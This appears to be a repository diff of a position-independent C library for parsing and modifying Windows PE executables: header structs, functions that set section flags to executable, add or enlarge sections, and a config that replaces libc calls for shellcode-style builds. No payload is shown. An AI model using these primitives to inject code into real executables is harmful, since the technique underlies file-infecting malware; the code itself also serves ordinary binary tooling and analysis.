#define IMAGE_REL_PPC_TOCDEFN 0x0800 // toc slot defined in file (or, data in toc)
#define IMAGE_REL_SH3_DIRECT16 0x0001 // 16 bit direct
#define IMAGE_REL_SH3_DIRECT32 0x0002 // 32 bit direct
#define IMAGE_REL_SH3_DIRECT8_WORD 0x0004 // 8 bit direct .W (0 ext.)
#define IMAGE_REL_SH3_DIRECT8_LONG 0x0005 // 8 bit direct .L (0 ext.)
#define IMAGE_REL_SH3_DIRECT4 0x0006 // 4 bit direct (0 ext.)
#define IMAGE_REL_SH3_DIRECT4_WORD 0x0007 // 4 bit direct .W (0 ext.)
#define IMAGE_REL_SH3_PCREL8_WORD 0x0009 // 8 bit PC relative .W
#define IMAGE_REL_SH3_PCREL8_LONG 0x000A // 8 bit PC relative .L
#define IMAGE_REL_SH3_PCREL12_WORD 0x000B // 12 LSB PC relative .W
#define IMAGE_REL_SH3_SIZEOF_SECTION 0x000D // Size of EXE section
#define IMAGE_REL_SH3_SECTION 0x000E // Section table index
#define IMAGE_REL_SH3_SECREL 0x000F // Offset within section
#define IMAGE_REL_SH3_DIRECT32_NB 0x0010 // 32 bit direct not based
#define IMAGE_REL_SH3_GPREL4_LONG 0x0011 // GP-relative addressing
#define IMAGE_REL_SH3_TOKEN 0x0012 // clr token
#define IMAGE_REL_SHM_PCRELPT 0x0013 // Offset from current
#define IMAGE_REL_SHM_REFLO 0x0014 // Low bits of 32-bit address
#define IMAGE_REL_SHM_REFHALF 0x0015 // High bits of 32-bit address
#define IMAGE_REL_SHM_RELLO 0x0016 // Low bits of relative reference
#define IMAGE_REL_SHM_RELHALF 0x0017 // High bits of relative reference
#define IMAGE_REL_SHM_PAIR 0x0018 // offset operand for relocation
#define IMAGE_REL_SH_NOMODE 0x8000 // relocation ignores section mode
#define IMAGE_REL_ARM_ABSOLUTE 0x0000 // No relocation required
#define IMAGE_REL_ARM_ADDR32 0x0001 // 32 bit address
#define IMAGE_REL_ARM_ADDR32NB 0x0002 // 32 bit address w/o image base
#define IMAGE_REL_ARM_BRANCH24 0x0003 // 24 bit offset << 2 & sign ext.
#define IMAGE_REL_ARM_BRANCH11 0x0004 // Thumb: 2 11 bit offsets
#define IMAGE_REL_ARM_TOKEN 0x0005 // clr token
#define IMAGE_REL_ARM_GPREL7 0x0007 // GP-relative addressing (Thumb)
#define IMAGE_REL_ARM_BLX24 0x0008
#define IMAGE_REL_ARM_BLX11 0x0009
#define IMAGE_REL_ARM_SECREL 0x000F // Offset within section
#define IMAGE_REL_AM_ABSOLUTE 0x0000
#define IMAGE_REL_AM_ADDR32NB 0x0002
#define IMAGE_REL_AM_FUNCINFO 0x0004
#define IMAGE_REL_AM_REL32_1 0x0005
#define IMAGE_REL_AM_REL32_2 0x0006
#define IMAGE_REL_AM_SECTION 0x0008
#define IMAGE_REL_AM_TOKEN 0x0009
#define IMAGE_REL_AMD64_ADDR64 0x0001 // 64-bit address (VA).
#define IMAGE_REL_AMD64_ADDR32 0x0002 // 32-bit address (VA).
#define IMAGE_REL_AMD64_REL32 0x0004 // 32-bit relative address from byte following reloc
#define IMAGE_REL_AMD64_REL32_1 0x0005 // 32-bit relative address from byte distance 1 from reloc
#define IMAGE_REL_AMD64_REL32_3 0x0007 // 32-bit relative address from byte distance 3 from reloc
#define IMAGE_REL_AMD64_REL32_5 0x0009 // 32-bit relative address from byte distance 5 from reloc
#define IMAGE_REL_AMD64_SECREL 0x000B // 32 bit offset from base of section containing target
#define IMAGE_REL_AMD64_SECREL7 0x000C // 7 bit unsigned offset from base of section containing target
#define IMAGE_REL_AMD64_SREL32 0x000E // 32 bit signed span-dependent value emitted into object
#define IMAGE_REL_AMD64_SSPAN32 0x0010 // 32 bit signed span-dependent value applied at link time
#define IMAGE_REL_IA64_IMM14 0x0001
#define IMAGE_REL_IA64_IMM64 0x0003
#define IMAGE_REL_IA64_DIR32 0x0004
#define IMAGE_REL_IA64_PCREL21B 0x0006
#define IMAGE_REL_IA64_PCREL21F 0x0008
#define IMAGE_REL_IA64_LTOFF22 0x000A
#define IMAGE_REL_IA64_SECTION 0x000B
#define IMAGE_REL_IA64_SECREL22 0x000C
#define IMAGE_REL_IA64_SECREL64I 0x000D
#define IMAGE_REL_IA64_SECREL32 0x000E
#define IMAGE_REL_IA64_DIR32NB 0x0010
#define IMAGE_REL_IA64_SREL22 0x0012
#define IMAGE_REL_IA64_SREL32 0x0013
#define IMAGE_REL_IA64_UREL32 0x0014
#define IMAGE_REL_IA64_PCREL60B 0x0016 // If possible, convert to MBB bundle with NOP.B in slot 1
#define IMAGE_REL_IA64_PCREL60F 0x0017 // If possible, convert to MFB bundle with NOP.F in slot 1
#define IMAGE_REL_IA64_PCREL60I 0x0018 // If possible, convert to MIB bundle with NOP.I in slot 1
#define IMAGE_REL_IA64_PCREL60M 0x0019 // If possible, convert to MMB bundle with NOP.M in slot 1
#define IMAGE_REL_IA64_IMMGPREL64 0x001A
#define IMAGE_REL_IA64_TOKEN 0x001B // clr token
#define IMAGE_REL_IA64_GPREL32 0x001C
#define IMAGE_REL_IA64_ADDEND 0x001F
#define IMAGE_REL_CEF_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_CEF_ADDR64 0x0002 // 64-bit address (VA).
#define IMAGE_REL_CEF_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
#define IMAGE_REL_CEF_SECTION 0x0004 // Section index
#define IMAGE_REL_CEF_TOKEN 0x0006 // 32 bit metadata token
#define IMAGE_REL_CEE_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
#define IMAGE_REL_CEE_ADDR32 0x0001 // 32-bit address (VA).
#define IMAGE_REL_CEE_ADDR64 0x0002 // 64-bit address (VA).
#define IMAGE_REL_CEE_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
#define IMAGE_REL_CEE_SECREL 0x0005 // 32 bit offset from base of section containing target
#define IMAGE_REL_CEE_TOKEN 0x0006 // 32 bit metadata token
#define IMAGE_REL_M32R_ADDR32 0x0001 // 32 bit address
#define IMAGE_REL_M32R_ADDR32NB 0x0002 // 32 bit address w/o image base
#define IMAGE_REL_M32R_ADDR24 0x0003 // 24 bit address
#define IMAGE_REL_M32R_PCREL24 0x0005 // 24 bit offset << 2 & sign ext.
#define IMAGE_REL_M32R_PCREL8 0x0007 // 8 bit offset << 2 & sign ext.
#define IMAGE_REL_M32R_REFHALF 0x0008 // 16 MSBs
#define IMAGE_REL_M32R_REFHI 0x0009 // 16 MSBs; adj for LSB sign ext.
#define IMAGE_REL_M32R_REFLO 0x000A // 16 LSBs
#define IMAGE_REL_M32R_PAIR 0x000B // Link HI and LO
#define IMAGE_REL_M32R_SECTION 0x000C // Section table index
#define IMAGE_REL_M32R_SECREL32 0x000D // 32 bit section relative reference
#define IMAGE_REL_M32R_TOKEN 0x000E // clr token
#define IMAGE_REL_EBC_ABSOLUTE 0x0000 // No relocation required
#define IMAGE_REL_EBC_ADDR32NB 0x0001 // 32 bit address w/o image base
#define IMAGE_REL_EBC_REL32 0x0002 // 32-bit relative address from byte following reloc
#define IMAGE_REL_EBC_SECTION 0x0003 // Section table index
#define IMAGE_REL_EBC_SECREL 0x0004 // Offset within section
#define IMAGE_REL_BASED_ABSOLUTE 0
#define IMAGE_REL_BASED_LOW 2
#define IMAGE_REL_BASED_HIGHLOW 3
#define IMAGE_REL_BASED_HIGHADJ 4
#define IMAGE_REL_BASED_MIPS_JMPADDR 5
#define IMAGE_REL_BASED_MIPS_JMPADDR16 9
#define IMAGE_REL_BASED_DIR64 10
#define IMAGE_ARCHIVE_START "!<arch>\n"
#define IMAGE_ARCHIVE_PAD "\n"
#define IMAGE_ARCHIVE_LINKER_MEMBER "/ "
#define IMAGE_ARCHIVE_LONGNAMES_MEMBER "// "
#define IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR 60
#define IMAGE_ORDINAL_FLAG64 0x8000000000000000
#define IMAGE_ORDINAL_FLAG32 0x80000000
#define IMAGE_ORDINAL_FLAG IMAGE_ORDINAL_FLAG64
#define IMAGE_RESOURCE_NAME_IS_STRING 0x80000000
#define IMAGE_DEBUG_TYPE_UNKNOWN 0
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
uint16_t e_magic; // Magic number
uint16_t e_cblp; // Bytes on last page of file
uint16_t e_cp; // Pages in file
uint16_t e_crlc; // Relocations
uint16_t e_cparhdr; // Size of header in paragraphs
uint16_t e_minalloc; // Minimum extra paragraphs needed
uint16_t e_maxalloc; // Maximum extra paragraphs needed
uint16_t e_ss; // Initial (relative) SS value
uint16_t e_sp; // Initial SP value
uint16_t e_csum; // Checksum
uint16_t e_ip; // Initial IP value
uint16_t e_cs; // Initial (relative) CS value
uint16_t e_lfarlc; // File address of relocation table
uint16_t e_ovno; // Overlay number
uint16_t e_res[4]; // Reserved words
uint16_t e_oemid; // OEM identifier (for e_oeminfo)
uint16_t e_oeminfo; // OEM information; e_oemid specific
uint16_t e_res2[10]; // Reserved words
uint32_t e_lfanew; // File address of new exe header
} IMAGE_DOS_HEADER ;
typedef struct _IMAGE_FILE_HEADER {
uint16_t Machine;
uint16_t NumberOfSections;
uint32_t TimeDateStamp;
uint32_t PointerToSymbolTable;
uint32_t NumberOfSymbols;
uint16_t SizeOfOptionalHeader;
uint16_t Characteristics;
} IMAGE_FILE_HEADER;
typedef struct _IMAGE_DATA_DIRECTORY {
uint32_t VirtualAddress;
uint32_t Size;
} IMAGE_DATA_DIRECTORY;
typedef struct _IMAGE_OPTIONAL_HEADER {
//
// Standard fields.
//
uint16_t Magic;
uint8_t MajorLinkerVersion;
uint8_t MinorLinkerVersion;
uint32_t SizeOfCode;
uint32_t SizeOfInitializedData;
uint32_t SizeOfUninitializedData;
uint32_t AddressOfEntryPoint;
uint32_t BaseOfCode;
uint32_t BaseOfData;
//
// NT additional fields.
//
uint32_t ImageBase;
uint32_t SectionAlignment;
uint32_t FileAlignment;
uint16_t MajorOperatingSystemVersion;
uint16_t MinorOperatingSystemVersion;
uint16_t MajorImageVersion;
uint16_t MinorImageVersion;
uint16_t MajorSubsystemVersion;
uint16_t MinorSubsystemVersion;
uint32_t Win32VersionValue;
uint32_t SizeOfImage;
uint32_t SizeOfHeaders;
uint32_t CheckSum;
uint16_t Subsystem;
uint16_t DllCharacteristics;
uint32_t SizeOfStackReserve;
uint32_t SizeOfStackCommit;
uint32_t SizeOfHeapReserve;
uint32_t SizeOfHeapCommit;
uint32_t LoaderFlags;
uint32_t NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32;
typedef struct _IMAGE_OPTIONAL_HEADER64 {
uint16_t Magic;
uint8_t MajorLinkerVersion;
uint8_t MinorLinkerVersion;
uint32_t SizeOfCode;
uint32_t SizeOfInitializedData;
uint32_t SizeOfUninitializedData;
uint32_t AddressOfEntryPoint;
uint32_t BaseOfCode;
uint64_t ImageBase;
uint32_t SectionAlignment;
uint32_t FileAlignment;
uint16_t MajorOperatingSystemVersion;
uint16_t MinorOperatingSystemVersion;
uint16_t MajorImageVersion;
uint16_t MinorImageVersion;
uint16_t MajorSubsystemVersion;
uint16_t MinorSubsystemVersion;
uint32_t Win32VersionValue;
uint32_t SizeOfImage;
uint32_t SizeOfHeaders;
uint32_t CheckSum;
uint16_t Subsystem;
uint16_t DllCharacteristics;
uint64_t SizeOfStackReserve;
uint64_t SizeOfStackCommit;
uint64_t SizeOfHeapReserve;
uint64_t SizeOfHeapCommit;
uint32_t LoaderFlags;
uint32_t NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64;
typedef struct _IMAGE_NT_HEADERS64 {
uint32_t Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64;
typedef struct _IMAGE_NT_HEADERS {
uint32_t Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32;
typedef struct _IMAGE_SECTION_HEADER {
uint8_t Name[IMAGE_SIZEOF_SHORT_NAME];
union {
uint32_t PhysicalAddress;
uint32_t VirtualSize;
} Misc;
uint32_t VirtualAddress;
uint32_t SizeOfRawData;
uint32_t PointerToRawData;
uint32_t PointerToRelocations;
uint32_t PointerToLinenumbers;
uint16_t NumberOfRelocations;
uint16_t NumberOfLinenumbers;
uint32_t Characteristics;
} IMAGE_SECTION_HEADER;
typedef struct _IMAGE_EXPORT_DIRECTORY {
uint32_t Characteristics;
uint32_t TimeDateStamp;
uint16_t MajorVersion;
uint16_t MinorVersion;
uint32_t Name;
uint32_t Base;
uint32_t NumberOfFunctions;
uint32_t NumberOfNames;
uint32_t AddressOfFunctions; // RVA from base of image
uint32_t AddressOfNames; // RVA from base of image
uint32_t AddressOfNameOrdinals; // RVA from base of image
} IMAGE_EXPORT_DIRECTORY;
typedef struct _IMAGE_IMPORT_BY_NAME {
uint16_t Hint;
uint8_t Name[1];
} IMAGE_IMPORT_BY_NAME;
typedef struct _IMAGE_THUNK_DATA64 {
union {
uint64_t ForwarderString; // Puint8_t
uint64_t Function; // PDWORD
uint64_t Ordinal;
uint64_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA64;
typedef struct _IMAGE_THUNK_DATA32 {
union {
uint32_t ForwarderString; // Puint8_t
uint32_t Function; // PDWORD
uint32_t Ordinal;
uint32_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA32;
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
uint32_t Characteristics; // 0 for terminating null import descriptor
uint32_t OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
} u1;
uint32_t TimeDateStamp; // 0 if not bound,
// -1 if bound, and real date\time stamp
// in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
// O.W. date/time stamp of DLL bound to (Old BIND)
uint32_t ForwarderChain; // -1 if no forwarders
uint32_t Name;
uint32_t FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
#endif

15
pic-peter/peter.h Normal file
View File

@ -0,0 +1,15 @@
//License: GPLv3.0
/*! \file peter.h
\brief This file is the file you can actually include for using the library.
It does nothing but including other header files.
*/
#ifndef PETER_H
#define PETER_H
#include "hdrs.h"
#include "sections.h"
#include "imports.h"
#include "exports.h"
#endif

10
pic-peter/rep.cnf Normal file
View File

@ -0,0 +1,10 @@
strlen:pic_strlen
strncmp:pic_strncmp
memcpy:pic_memcpy
memset:pic_memset
strncpy:pic_memcpy
malloc:pic_malloc
free:pic_free
#include <stdio.h>:#include "../stdfuncs.h"
#include <string.h>:
#include <stdlib.h>:

329
pic-peter/sections.c Normal file
View File

@ -0,0 +1,329 @@
//License: GPLv3.0
#include "sections.h"
#include "misc.h"
IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index)
{
hdrs h;
IMAGE_SECTION_HEADER *sh;
if (-1 == hdrs_init(&h, image))
return NULL;
if (index >= hdrs_get_number_of_sections(&h))
return NULL;
sh = hdrs_get_first_section_header(&h);
if (-1 == test_for_list_end(sh, index, sizeof (IMAGE_SECTION_HEADER)))
return NULL;
hdrs_destroy(&h);
return &sh[index];
}
/////////////////////////////////////////////////
IMAGE_SECTION_HEADER* sections_by_name_get_sh(void *image, const char *name)
{
hdrs h;
IMAGE_SECTION_HEADER *currSh;
if (-1 == hdrs_init(&h, image))
goto sections_by_name_get_sh_error;
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
{
currSh = sections_by_index_get_sh(image, i);
if (0 == pic_strncmp(name, currSh->Name, IMAGE_SIZEOF_SHORT_NAME))
{
hdrs_destroy(&h);
return currSh;
}
}
sections_by_name_get_sh_error:
hdrs_destroy(&h);
return NULL;
}
/////////////////////////////////////////////////
int sections_by_name_get_index(void *image, const char *name)
{
hdrs h;
IMAGE_SECTION_HEADER *currSh;
if (-1 == hdrs_init(&h, image))
goto sections_by_name_get_index_error;
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
{
currSh = sections_by_index_get_sh(image, i);
if (0 == pic_strncmp(name, currSh->Name, IMAGE_SIZEOF_SHORT_NAME))
{
hdrs_destroy(&h);
return i;
}
}
sections_by_name_get_index_error:
hdrs_destroy(&h);
return -1;
}
/////////////////////////////////////////////////
char *sections_by_index_get_name(void *image, int idx)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_index_get_sh(image, idx);
if (NULL == sh) return NULL;
return sh->Name;
}
/////////////////////////////////////////////////
void *sections_by_name_get_pointer_to_memory(void *image, const char *name)
{
IMAGE_SECTION_HEADER *sh = sections_by_name_get_sh(image, name);
return &((char*)image)[sh->PointerToRawData];
}
/////////////////////////////////////////////////
void sections_by_name_set_name(void *image, const char *name, const char *replace)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
pic_memset(sh->Name, 0, IMAGE_SIZEOF_SHORT_NAME);
pic_memcpy(sh->Name, replace, IMAGE_SIZEOF_SHORT_NAME);
return;
}
/////////////////////////////////////////////////
void sections_by_name_set_characteristics(void *image, const char *name, uint32_t characteristics)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
sh->Characteristics = characteristics;
return;
}
/////////////////////////////////////////////////
uint32_t sections_by_name_get_characteristics(void *image, const char *name)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
return sh->Characteristics;
}
/////////////////////////////////////////////////
int sections_by_name_is_writable(void *image, const char *name)
{
uint32_t flags = sections_by_name_get_characteristics(image, name);
if (IMAGE_SCN_MEM_WRITE & flags)
return 1;
return 0;
}
//////////////////////////////////////////////////
int sections_by_name_is_readable(void *image, const char *name)
{
uint32_t flags = sections_by_name_get_characteristics(image, name);
if (IMAGE_SCN_MEM_READ & flags)
return 1;
return 0;
}
////////////////////////////////////////////////
int sections_by_name_is_executable(void *image, const char *name)
{
uint32_t flags = sections_by_name_get_characteristics(image, name);
if (IMAGE_SCN_MEM_EXECUTE & flags)
return 1;
return 0;
}
/////////////////////////////////////////////////
void sections_by_name_set_writable(void *image, const char *name)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_WRITE);
}
//////////////////////////////////////////////////
void sections_by_name_set_readable(void *image, const char *name)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_READ);
}
////////////////////////////////////////////////
void sections_by_name_set_executable(void *image, const char *name)
{
IMAGE_SECTION_HEADER *sh;
sh = sections_by_name_get_sh(image, name);
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_EXECUTE);
}
/////////////////////////////////////////////////
void *sections_add_section(void *image, int imageSz, void *spaceRetImage,
int spaceSz, const char *name, uint32_t size)
{
void *newImage;
int newImageSz;
IMAGE_SECTION_HEADER *newSection, *lastSection;
hdrs h;
if (-1 == hdrs_init(&h, image))
return NULL;
newImageSz = imageSz + align(size, hdrs_get_file_alignment(&h));
if (newImageSz > spaceSz) return NULL;
newImage = spaceRetImage;
hdrs_destroy(&h);
pic_memcpy(newImage, image, imageSz);
if (-1 == hdrs_init(&h, newImage))
goto sections_add_section_error;
/*hdrs_get_number_of_sections returns the index of the last section+1
because indexes start counting with 0*/
newSection = sections_by_index_get_sh(newImage,
(hdrs_get_number_of_sections(&h)-1));
newSection++;
pic_memcpy(newSection->Name, name, IMAGE_SIZEOF_SHORT_NAME);
newSection->Misc.VirtualSize = size;
lastSection = sections_by_index_get_sh(newImage,
hdrs_get_number_of_sections(&h)-1);
newSection->VirtualAddress = lastSection->VirtualAddress
+ lastSection->Misc.VirtualSize;
newSection->VirtualAddress = align(newSection->VirtualAddress,
hdrs_get_section_alignment(&h));
newSection->SizeOfRawData = align(size, hdrs_get_file_alignment(&h));
newSection->PointerToRawData = lastSection->PointerToRawData
+ lastSection->SizeOfRawData;
newSection->Characteristics = 0;
hdrs_set_number_of_sections(&h, hdrs_get_number_of_sections(&h)+1);
hdrs_set_size_of_image(&h, hdrs_get_size_of_image(&h)
+ align(newSection->Misc.VirtualSize,
hdrs_get_section_alignment(&h)));
/*relocate the symbol table*/
int stripSz;
char *stripBuf;
if (hdrs_get_pointer_to_symbol_table(&h))
{
stripSz = imageSz - hdrs_get_pointer_to_symbol_table(&h);
stripBuf = pic_malloc(stripSz);
pic_memcpy(stripBuf, &((char*)newImage)[hdrs_get_pointer_to_symbol_table(&h)], stripSz);
hdrs_set_pointer_to_symbol_table(&h, newSection->PointerToRawData
+ newSection->SizeOfRawData);
pic_memcpy(&((char*)newImage)[hdrs_get_pointer_to_symbol_table(&h)], stripBuf,
stripSz);
pic_free(stripBuf);
}
return &((char *)newImage)[newSection->PointerToRawData];
sections_add_section_error:
pic_free(newImage);
return NULL;
}
/////////////////////////////////////////////////
uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
uint32_t oldSz,
uint32_t addedSz)
{
hdrs h;
uint32_t newImageSz;
hdrs_init(&h, oldImage);
newImageSz = oldSz + align(addedSz, hdrs_get_file_alignment(&h));
hdrs_destroy(&h);
return newImageSz;
}
/////////////////////////////////////////////////
void *sections_by_name_enlarge(void *image, const char *name,
char *bytes, uint32_t bytesLen)
{
IMAGE_SECTION_HEADER *enlargeSec;
char *writePtr;
enlargeSec = sections_by_name_get_sh(image, name);
if (NULL == enlargeSec) return NULL;
if ((enlargeSec->SizeOfRawData - enlargeSec->Misc.VirtualSize) < bytesLen)
return NULL;
writePtr = rva_to_ptr(image, (enlargeSec->VirtualAddress));
writePtr += enlargeSec->Misc.VirtualSize;
enlargeSec->Misc.VirtualSize += bytesLen;
if (NULL != bytes)
pic_memcpy(writePtr, bytes, bytesLen);
return (void *)writePtr;
}
/////////////////////////////////////////////////
uint32_t rva_to_raw(char *image, uint32_t rva)
{
hdrs h;
hdrs_init(&h, image);
IMAGE_SECTION_HEADER *sh;
for(int i = 0; i < hdrs_get_number_of_sections(&h); i++)
{
sh = sections_by_index_get_sh(image, i);
if (sh->VirtualAddress <= rva
&& rva < (sh->VirtualAddress + sh->Misc.VirtualSize))
return (rva - sh->VirtualAddress + sh->PointerToRawData);
}
return -1;
}
/////////////////////////////////////////////////
void *rva_to_ptr(void *image, uint32_t rva)
{
return &((char *)image)[rva_to_raw(image, rva)];
}
/////////////////////////////////////////////////
uint32_t raw_to_rva(char *image, uint32_t raw)
{
hdrs h;
IMAGE_SECTION_HEADER *sh;
hdrs_init(&h, image);
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
{
sh = sections_by_index_get_sh(image, i);
if (sh->PointerToRawData <= raw
&& raw < (sh->PointerToRawData + sh->SizeOfRawData))
return (raw - sh->PointerToRawData + sh->VirtualAddress);
}
return -1;
}
/////////////////////////////////////////////////
uint32_t ptr_to_rva(void *image, void *ptr)
{
uint32_t raw;
raw = (uint32_t)(ptr - image);
return raw_to_rva(image, raw);
}

191
pic-peter/sections.h Normal file
View File

@ -0,0 +1,191 @@
//License: GPLv3.0
/*! \file sections.h
\brief This file contains functions for getting information concerning the
section headers (e.g. sections_by_name_is_writable() informs you
wether the writable flag in a section header is set).
An other type of function changes the values within the section
headers (set functions like sections_by_name_set_name() ) or may even
add a new one. The functions which convert e.g. pointers to rva
values where placed in this header too, because they need information
from the section headers to calculate their return values.
*/
#include "hdrs.h"
#ifndef SECTIONS_HDR
#define SECTIONS_HDR
/*! \fn IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index)
\brief returns a pointer on the IMAGE_SECTION_HEADER at the indexed
poisition.
\param image is a pointer on the PE file in memory.
\param index starts with 0 and is 1 if you want the second section header.
*/
IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index);
/*! \fn IMAGE_SECTION_HEADER *sections_by_name_get_sh(void *image,
const char *name)
\brief like sections_by_index_get_sh() but index is replaced by the section
name.
\param image is the PE file.
\param name is a pointer on the section name. It should not exceed 8 bytes
since the section names of PE files are not alowed to be longer
than 8 bytes.
*/
IMAGE_SECTION_HEADER *sections_by_name_get_sh(void *image, const char *name);
/*! \fn int sections_by_name_get_index(void *image, const char *name);
\brief Tells you at which position the section header with the name xy lies.
\param image is the PE file.
\param name is the name of the section (max 8 byte)
**/
int sections_by_name_get_index(void *image, const char *name);
/*! \fn uint32_t sections_by_name_get_characteristics(void *image,
const char *name)
\brief returns the characteristics field of a section header.
\param image is like always the PE file.
\param name is the section name.
**/
uint32_t sections_by_name_get_characteristics(void *image, const char *name);
/*! \fn char *sections_by_index_get_name(void *image, int idx)
\brief returns the name of the section nr idx
\param index is the PE file.
\param idx is the section index (starts with 0)
*/
char *sections_by_index_get_name(void *image, int idx);
/*! \fn int sections_by_name_is_writable(void *image, const char *name)
\brief returns 1 if the section is writable and 0 if not
\param image is the PE file.
\param name is the section name
*/
int sections_by_name_is_writable(void *image, const char *name);
/*! \fn int sections_by_name_is_readable(void *image, const char *name)
\brief returns 1 if section is readable and 0 if not
\param image is the PE file.
\param name is the section name.
*/
int sections_by_name_is_readable(void *image, const char *name);
/*! \fn int sections_by_name_is_executable(void *image, const char *name)
\brief returns 1 if the section is executable and 0 if not.
\param image is the PE file.
\param name is the section name.
*/
int sections_by_name_is_executable(void *image, const char *name);
/*! \fn void *sections_by_name_get_pointer_to_memory(void *image,
const char *name)
\brief returns a pointer on the first byte of a section
\param image is the PE file.
\param name is the section name.
*/
void *sections_by_name_get_pointer_to_memory(void *image, const char *name);
/*! \fn uint32_t rva_to_raw(char *image, uint32_t rva)
\brief you give it a 32bit rva and it returns the raw offset
\param image is the PE file.
\param rva
*/
uint32_t rva_to_raw(char *image, uint32_t rva);
/*! \fn void *rva_to_ptr(void *image, uint32_t rva)
\param image
\param rva
*/
void *rva_to_ptr(void *image, uint32_t rva);
/*! \fn uint32_t raw_to_rva(char *image, uint32_t raw)
\brief returns a rva if you give it a raw offset
\param image
\param raw
*/
uint32_t raw_to_rva(char *image, uint32_t raw);
/*! \fn uint32_t ptr_to_rva(char *image, char *ptr)
\brief makes a rva address from a pointer
\param image
\param ptr
*/
uint32_t ptr_to_rva(void *image, void *ptr);
/*! \fn void sections_by_name_set_writable(void *image, const char *name)
\brief Sets the writable flag in the section header
\param image is the PE image
\param name is the section name
*/
void sections_by_name_set_writable(void *image, const char *name);
/*! \fn void sections_by_name_set_readable(void *image, const char *name)
\brief sets the readable flag in the section header
\param image
\param name
*/
void sections_by_name_set_readable(void *image, const char *name);
/*! \fn void sections_by_name_set_executable(void *image, const char *name)
\brief sets the executable flag in the section header
\param image
\param name
*/
void sections_by_name_set_executable(void *image, const char *name);
/*! \fn void sections_by_name_set_name(void *image, const char *name,
const char *replace)
\brief replaces the section name with a section name of your choise
(8 byte max)
\param image is the PE file
\param name is the section name you want to replace
\param replace is the new section name
*/
void sections_by_name_set_name(void *image, const char *name,
const char *replace);
/*! \fn void sections_by_name_set_characteristics(void *image,
const char *name,
uint32_t characteristics)
\brief sets the characteristics field of a section header.
\param image is the PE file.
\param name is the name of the section
\param characteristics is the value the characteristics filed should be changed to.
*/
void sections_by_name_set_characteristics(void *image, const char *name,
uint32_t characteristics);
/*! \fn void *sections_add_section(void *image, int imageSz,
void *spaceRetImage, int spaceSz,
const char *name, uint32_t size)
\brief Creates a new PE image from image. The new image will be written to
spaceSpaceRetImage is there is enough space. The new image will be
like the old but with a section added to it. You can calculate the
number of bytes you must allocate with:
sections_get_sizeof_image_after_add_section().
The return value is a pointer on the first byte of the new section.
\param image is the old pe image
\param imageSz is the size of the old image in bytes
\param spaceRetImage should point on an allocated space in memory
\param spaceSz must contain the size in bytes of the memory spaceRetImage
is pointing to.
\param name is the name of the new section (not longer than 8 bytes)
\param size is how big you want the new section to be (in bytes)
*/
void *sections_add_section(void *image, int imageSz, void *spaceRetImage,
int spaceSz, const char *name, uint32_t size);
/*! \fn uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
uint32_t oldSz,
uint32_t addedSz)
\brief calculates the size, the image will have after adding a section
\param oldImage is the PE image before adding a section
\param oldSz is the size of the image, oldImage is pointing to
\param addedSz is the size of the section you want to add.
*/
uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
uint32_t oldSz,
uint32_t addedSz);
/*! \fn void *sections_by_name_enlarge(void *image, const char *name,
char *bytes, uint32_t bytesLen)
\brief enlarges a section and returns a pointer on the first byte of the
new allocated space. If it fails it returns NULL.
\param image is the PE image
\param name is the name of the section you want to enlarge
\param bytes are the bytes you want to add to the section. It can be NULL.
\param bytesLen is the size in bytes by which you want the section to be
enlarged.
*/
void *sections_by_name_enlarge(void *image, const char *name,
char *bytes, uint32_t bytesLen);
#endif

1213
stdfuncs.c Normal file
View File

File diff suppressed because it is too large Load Diff

216
stdfuncs.h Normal file
View File

@ -0,0 +1,216 @@
#include <stdlib.h>
#include "peb.h"
#include "export.h"
#include <stdio.h>
#include "winfuncs.h"
#ifndef STDFUNCS
#define STDFUNCS 1
#define MAX_PATH 260
typedef struct _FILETIME {
uint32_t dwLowDateTime;
uint32_t dwHighDateTime;
} FILETIME, *PFILETIME;
typedef struct _WIN32_FIND_DATAA {
uint32_t dwFileAttributes;
FILETIME ftCreationTime;
FILETIME ftLastAccessTime;
FILETIME ftLastWriteTime;
uint32_t nFileSizeHigh;
uint32_t nFileSizeLow;
uint32_t dwReserved0;
uint32_t dwReserved1;
